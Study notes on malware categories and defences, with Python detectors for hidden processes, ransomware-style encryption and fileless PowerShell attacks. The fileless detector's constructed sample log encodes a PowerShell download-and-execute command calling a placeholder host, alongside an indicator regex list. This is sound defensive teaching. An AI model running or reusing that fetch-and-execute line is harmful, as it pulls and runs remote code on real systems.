2.4 - Malware

Malware Overview

  • Definition: Malware is a broad term for any software written to run on a system against its owner's interests. The categories below differ mainly in how the code gets onto the system and what it does once it is running.

Examples of Malware Types

  • Information Gathering Malware

    • Designed to gather sensitive information from users' systems, such as keystrokes.

  • Botnets

    • Infected systems can be enrolled, under an attacker's remote control, into a botnet; the combined machines are then put to work on tasks such as sending spam or launching denial-of-service attacks.

  • Adware

    • Displays advertisements to generate revenue for attackers.

  • Viruses and Worms

    • Self-replicating malware. A virus attaches itself to files or programs and needs a user to run the infected item; a worm spreads on its own across the network, typically by exploiting a vulnerability, with no user action required. Both can damage systems and documents as they spread.

Methods of Malware Access

  • Malware often gets in through a software vulnerability, either a known one that has not been patched yet or an unknown (zero-day) one for which no patch exists.

  • Embedding Process

    • After exploiting the vulnerability, the malware establishes itself on the system and can install additional components, such as a remote-access backdoor that gives the attacker a persistent way back in.

  • Initial Execution

    • The process starts with malicious code running in the system's memory. Common triggers:

      • Malicious links in emails leading to infected websites.

      • Pop-ups on websites prompting users to click.

      • Drive-by downloads, where malware is downloaded and run automatically while visiting a site, usually by exploiting a vulnerability in the browser or one of its plugins.

Protective Measures

  • Software Updates

    • Crucial for protecting against vulnerabilities; keep operating systems and applications updated to the latest versions.

Trojan Horse

  • Named after the Greek myth, in which the defenders themselves carry the attackers' wooden horse inside their walls.

  • A Trojan is malware disguised as, or bundled with, software the user wants, so users unknowingly invite it into their systems and install it themselves.

  • Antivirus Software

    • Can often identify and block Trojan Horses before they embed themselves into the system, but only those whose signatures or behavior it already recognizes.

  • Access and Rights

    • Once installed, a Trojan Horse runs with the same access rights as the user who launched it: everything that user can read, change, or run is available to it, and if that user is an administrator, so is the Trojan. Doing day-to-day work from a standard (non-administrator) account limits the damage.

  • Best Practices

    • Install only trusted software to mitigate risks associated with Trojans.

Rootkits

  • Definition

    • A rootkit is malware that modifies the operating system itself (commonly the kernel or its drivers) so that it, and whatever it is protecting, stays concealed from detection tools such as antivirus software.

  • Superuser Account

    • The term 'root' refers to the superuser account on Unix/Linux systems: the original rootkits were tool sets that let an intruder keep root-level access while hiding their tracks, and rootkits still depend on this level of privilege to alter the OS.

  • Hiding Techniques

    • Because the rootkit sits inside the OS, it can filter what the OS reports: hidden processes, files, and network connections simply do not appear in process managers, directory listings, or antivirus scans that rely on the kernel's answers, which makes detection and removal from the running system hard.

  • UEFI BIOS and Secure Boot

    • Newer systems use UEFI Secure Boot to counter boot-level rootkits: the firmware checks the digital signature of the bootloader and other early boot components and refuses to run anything unsigned or modified. Secure Boot covers the boot chain, not arbitrary system files, so it does not by itself stop a rootkit that an already compromised administrator account loads later.

  • Rootkit Scanners

    • Many antivirus tools now include rootkit detection features, and some rootkits need a dedicated removal tool or a scan from clean boot media, where the rootkit is not running and cannot hide.
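The cross-view check below is an added example for these notes, not code from any particular rootkit scanner. It shows the basic idea behind rootkit detection on Linux: ask the operating system for its process list in two independent ways and look for disagreement. A rootkit that filters the /proc listing (what ps and top read) usually does not also intercept kill(pid, 0), so a PID that answers the probe but is missing from the listing is worth investigating. The 65536 cap on the probe range is an assumption made to keep runtime short.

```python
"""Cross-view rootkit check: compare the process list the OS reports (/proc)
against what a direct probe (kill(pid, 0)) says exists. Added example for
these notes, not from any named tool; Linux only."""
import os


def visible_pids():
    """Process IDs that appear in a directory listing of /proc.

    This is the view ps/top rely on, and the one a rootkit typically filters."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def probed_pids(max_pid):
    """Process IDs that exist according to kill(pid, 0), which never lists a
    directory and so is not fooled by a filtered /proc listing."""
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue          # no such pid
        except PermissionError:
            pass              # exists, but owned by another user
        found.add(pid)
    return found


def is_thread_id(pid):
    """True when pid is a non-leader thread. kill() accepts thread IDs and
    /proc/<tid>/status is readable even though <tid> is not listed, so without
    this filter every thread of every process shows up as a 'hidden process'."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) != pid
    except OSError:
        return False          # not even readable: not a thread, stays suspect
    return False


def find_hidden_pids(visible, probed, thread_filter=lambda pid: False):
    """Pure cross-view comparison on two sets of PIDs: anything the probe found
    that the listing omitted, minus known thread IDs."""
    return sorted(pid for pid in probed - visible if not thread_filter(pid))


def scan_live(max_pid=None):
    """Run the check on this host. pid_max comes from the kernel; the 65536 cap
    only bounds runtime and is an assumption of this example. The listing is
    taken before and after the probe so a process that starts or exits during
    the scan is not reported as hidden."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = min(int(f.read()), 65536)
    visible = visible_pids()
    probed = probed_pids(max_pid)
    visible |= visible_pids()
    return find_hidden_pids(visible, probed, is_thread_id)


if __name__ == "__main__":
    hidden = scan_live()
    print("hidden PIDs:", hidden or "none")
```

A hit from this check is a lead, not proof: confirm it on a second run, then look at the PID from a second independent angle (a scan from clean boot media, or a comparison of the kernel's view against raw disk contents for hidden files).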

Computer Viruses

  • Human Interaction

    • A virus attaches itself to an executable or document and runs when the user opens that item; it spreads from one computer to another only when someone carries and runs the infected file, commonly via downloads or USB drives (unlike a worm, which spreads on its own).

  • Stealthiness

    • Some viruses stay quiet to avoid notice; others consume enough CPU, memory, or disk activity that the resulting slowdown is itself a hint of infection.

  • Frequency of Virus Development

    • Thousands of new viruses and variants appear every week, so antivirus signature definitions must be updated constantly; heuristic and behavioral detection catches some of what signatures miss.

Spyware

  • Definition

    • Spyware monitors user activities and may keep records of mouse clicks and keystrokes.

  • Key Loggers

    • A specific type of spyware that records everything typed on the keyboard and sends it back to the attacker at regular intervals.

  • Security Challenges

    • A keylogger captures keystrokes before any encryption takes place (it reads what the user types, not what travels over the encrypted connection), so usernames, passwords, and anything else typed are exposed regardless of HTTPS. Multi-factor authentication limits what a captured password alone is worth.

Ransomware

  • Functionality

    • Encrypts users' documents and holds them to ransom: the attacker demands payment, usually in cryptocurrency, for the decryption key, and paying gives no guarantee that a working key is delivered.

  • Impact on Operating System

    • Typically, only user files are encrypted, while the OS remains operational to inform users about the ransom.

  • Backup Importance

    • Offline or otherwise isolated backups, tested by actually restoring from them, are the reliable way to recover; backups the infected machine can reach (mapped drives, always-connected external disks) are often encrypted along with everything else, and without any backup the victim risks losing the data for good.
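Because ransomware turns many readable documents into ciphertext in a short burst, one practical way to notice it is to watch file rewrites for a jump in byte entropy. The following is an added example for these notes, not code from any product: it measures Shannon entropy per byte, flags rewrites that go from document-like (low) to ciphertext-like (high), and only raises an alert when several files in one batch are affected. The file events, their contents, and the SHA-256 stand-in for encrypted output are all constructed samples.

```python
"""Spotting ransomware-style encryption by entropy: plaintext documents score
far below 8 bits per byte, ciphertext scores close to 8. Added example for
these notes; the file events and contents are constructed samples."""
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, from 0.0 (one repeated byte) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pseudo_ciphertext(seed: bytes, size: int) -> bytes:
    """Deterministic stand-in for encrypted output (SHA-256 in counter mode), so
    the sample runs the same way every time; real ciphertext has the same
    statistical profile."""
    out = bytearray()
    counter = 0
    while len(out) < size:
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:size])


def classify_rewrite(before: bytes, after: bytes, low=6.0, high=7.5):
    """One file rewrite. Returns (suspicious, reason).

    Only a jump from low to high entropy is flagged: a ZIP, JPEG or already
    encrypted file is high-entropy before and after, and rewriting it is normal."""
    e_before, e_after = shannon_entropy(before), shannon_entropy(after)
    reason = f"entropy {e_before:.2f} -> {e_after:.2f}"
    return (e_before < low and e_after >= high), reason


def detect_mass_encryption(events, min_files=3, min_size=256):
    """events: list of (old_path, new_path, before_bytes, after_bytes).
    Returns (verdict, flagged). Ransomware hits many files in a burst, so one
    flagged file is noise; min_files flagged in a batch is an alert. Tiny files
    are skipped because their entropy estimate is meaningless."""
    flagged = []
    for old_path, new_path, before, after in events:
        if len(after) < min_size:
            continue
        suspicious, reason = classify_rewrite(before, after)
        if suspicious:
            if new_path != old_path:
                reason += f", renamed to {new_path}"
            flagged.append((old_path, reason))
    return len(flagged) >= min_files, flagged


def sample_events():
    """Constructed batch: three documents encrypted and renamed, one archive
    rewritten (already high-entropy, so not an encryption event), one tiny file."""
    doc = b"Quarterly report: revenue grew, costs fell, see table 3.\n" * 60
    archive = pseudo_ciphertext(b"zip", 4096)   # compressed data is already high-entropy
    return [
        ("report.docx", "report.docx.locked", doc, pseudo_ciphertext(b"k1", len(doc))),
        ("notes.txt", "notes.txt.locked", doc, pseudo_ciphertext(b"k2", len(doc))),
        ("budget.xlsx", "budget.xlsx.locked", doc, pseudo_ciphertext(b"k3", len(doc))),
        ("photos.zip", "photos.zip", archive, pseudo_ciphertext(b"zip2", 4096)),
        ("tiny.txt", "tiny.txt.locked", b"hi", pseudo_ciphertext(b"k4", 2)),
    ]


if __name__ == "__main__":
    verdict, flagged = detect_mass_encryption(sample_events())
    print("mass encryption:", verdict)
    for path, note in flagged:
        print(" ", path, note)
```

The thresholds (6.0 and 7.5 bits per byte, three files per batch) are starting points, not constants: tune them against the file types a given share actually holds, since a directory full of archives or media will look high-entropy all the time.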

Bootloader and Malware

  • Embedding in Bootloader

    • Some advanced malware (often called a bootkit) replaces or modifies the bootloader so that it runs before the operating system starts, which lets it load ahead of any security software and tamper with the OS as it boots.

  • Prevention with Secure Boot

    • Secure Boot has the firmware verify the bootloader's digital signature against keys it trusts before handing over control; an altered or unsigned loader fails the check and is not executed.

Cryptocurrency Malware

  • Cryptominers

    • Malware that uses victims’ processing power to mine cryptocurrency without their consent.

  • Identifying Cryptomining Malicious Software

    • Sustained high CPU (or GPU) usage, along with the fan noise, heat, and slowdown that come with it, often gives cryptomining malware away; it is one of the easier types to notice, and a process consuming a full core with no user-facing purpose is the thing to look for.

Stalkerware

  • Definition

    • A type of surveillance software that tracks user activities and whereabouts, often with GPS capabilities.

  • Risks

    • Can invade privacy severely by capturing screenshots, recording conversations, and utilizing location data.

Fileless Malware

  • Nature

    • Runs entirely in memory rather than writing an executable to disk, so file-based antivirus scanning has nothing to inspect. It typically abuses tools that are already present and trusted (scripting engines, system administration utilities) and, if it needs to survive a reboot, stores a launcher in places such as the registry or a scheduled task rather than in a file.

  • Execution Process

    • Usually starts from a user action such as clicking a link or opening a document; the resulting script or exploit uses a software vulnerability, or a trusted built-in tool, to get code running in memory without ever dropping a file.
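Since there is no file to scan, detection of fileless malware leans on process command lines. The example below is added for these notes and is not from any detection product; it handles one common form of fileless attack, a PowerShell launch with an encoded command that pulls a second stage straight into memory. It decodes the -EncodedCommand argument (base64 over UTF-16LE, which is what PowerShell expects), then scores the raw and decoded text against a short indicator list. The process-creation log lines and their key="value" layout are constructed samples, not any product's log format, and the URL in them is a placeholder.

```python
"""Detection of one common fileless technique: PowerShell launched with an
encoded command that pulls a payload straight into memory. Added example for
these notes; the process-creation log lines are constructed samples, and the
key="value" field layout is an assumption, not any product's format."""
import base64
import re

# Indicators a practitioner looks for in a (decoded) PowerShell command line.
INDICATORS = {
    "download-to-memory": re.compile(r"DownloadString|Invoke-WebRequest|\bIWR\b|Net\.WebClient", re.I),
    "inline-execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "inline-decode": re.compile(r"FromBase64String", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no-profile-bypass": re.compile(r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of the UTF-16LE script; return the decoded
    script, or None when there is no such argument or it does not decode."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str):
    """Returns (hits, decoded): indicator names matched in the raw command line
    plus its decoded payload, and the decoded payload itself (or None)."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded-command")
    return hits, decoded


def parse_log_line(line: str):
    """Pull key="value" fields out of one constructed log line."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def find_suspicious(lines, min_hits=2):
    """Process-creation events whose command line shows min_hits or more
    indicators. One hit alone (say, -NoProfile) is routine admin activity."""
    results = []
    for line in lines:
        fields = parse_log_line(line)
        if "powershell" not in fields.get("Image", "").lower():
            continue
        hits, decoded = score_command_line(fields.get("CommandLine", ""))
        if len(hits) >= min_hits:
            results.append((fields.get("ProcessId"), sorted(hits), decoded))
    return results


def encode_for_powershell(script: str) -> str:
    """Produce the -EncodedCommand form the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_LOG = [  # constructed sample lines, not captured from a real host
    'EventType="ProcessCreate" ProcessId="4120" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -NoProfile -Command Get-Service"',
    'EventType="ProcessCreate" ProcessId="4188" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -nop -w hidden -enc '
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')") + '"',
    'EventType="ProcessCreate" ProcessId="4201" Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe"',
]

if __name__ == "__main__":
    for pid, hits, decoded in find_suspicious(SAMPLE_LOG):
        print(pid, hits)
        if decoded:
            print("  decoded:", decoded)
```

Requiring two or more indicators keeps routine administration (a lone -NoProfile, a scheduled script run with an execution-policy override) out of the alert queue; the decoded payload is kept in the result because the analyst needs to read what was actually about to run.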

Potentially Unwanted Programs (PUPs)

  • Classification

    • Not outright malicious, but unwanted: software that arrives bundled with other installers or without a clear choice on the user's part, and that degrades the user experience and system performance.

  • Common Symptoms

    • PUPs may alter browser settings, generate unwanted ads, or slow down the system's overall functionality.

  • Detection and Prevention

    • Regularly running antivirus scans with updated definitions is essential for identifying and eliminating PUPs effectively.